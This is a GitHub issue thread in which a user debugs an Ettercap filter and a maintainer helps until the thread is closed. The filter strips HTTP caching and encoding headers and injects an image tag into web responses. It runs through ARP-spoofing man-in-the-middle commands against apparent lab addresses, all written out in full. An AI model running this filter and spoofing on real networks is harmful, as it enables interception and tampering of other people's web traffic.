### ISSUE TITLE
Ettercap Filter Error

### ISSUE THREAD

**Issue by Dabuek** [Ettercap/ettercap#710]
I am having issues with Ettercap filters. It says it has applied but the response doesnt show this. Below is my filter.
```
if (ip.proto == TCP && tcp.dst == 80) {
	if (search(DATA.data, "Accept-Encoding")) {
		replace("Accept-Encoding", "Accept-Rubbish!");
		msg("zapped Accept-Encoding!\n");
	}
}
if (ip.proto ==  TCP && tcp.dst == 80) {
	if (search(DATA.data, "If-Modified-Since")) {
		replace("If-Modified-Since", "If-PACified-Since");
		msg("zapped If-Modified-Since\n");
	}
}
if (ip.proto == TCP && tcp.src == 80) {
	replace("img src=", "img src=\"http://10.10.10.17/pwned.jpg\" ");
	msg("pwned image injected\n");
}
```
Then I ran the following:
```
$ etterfilter pwned.filter -o pwned.ef
```
Then the below to perform arp spoofing, which was verified to be working.
```
$ ettercap -TqM arp:remote /10.10.10.13/ /10.10.10.17/
```
Then I ran the following to replace the headers/imgs:
```
$ ettercap -TqM arp:remote -F pwned.ef /10.10.10.13/ /10.10.10.17/
Tue Nov 24 19:36:56 2015
TCP  10.10.10.13:51345 --> 10.10.10.17:80 | A
zapped Accept-Encoding!
zapped If-Modified-Since
pwned image injected
pwned image injected
```
Despite receiving the msgs above the HTTP response does not reflect this - Nothing is replaced.... Am i doing something wrong here or is this an error in ettercap?

**Comment by koeppea** [comment]
Hi
Which version?
Please retry with the latest code base from Github.

**Comment by Dabuek** [comment]
I was using 0.80.0 but have updated to 0.82.0 and still experience the same issue.

**Comment by Dabuek** [comment]
I set ipforward for ipv4 to 1 and now I'm getting the img replacement but it only replaces it with '<img src="http://10.10.10.17' not the whole url entered.

**Comment by Dabuek** [comment]
Okay so.... that seems to have been lucky... ive had intermittent issues - I visited the 10.10.10.13 and then 10.10.10.17 and it worked.. but then it stopped working... despite ettercap saying it was replacing the text

**Comment by koeppea** [comment]
can you write the traffic into a capture file by running wireshark in parallel or using the -w option of ettercap?

**Comment by koeppea** [comment]
Is the host running ettercap wired or wireless?

**Comment by Dabuek** [comment]
Sorry, I fixed this by changing to a dumb switch.

**Comment by koeppea** [comment]
So closing this one.
Thanks for the feedback.
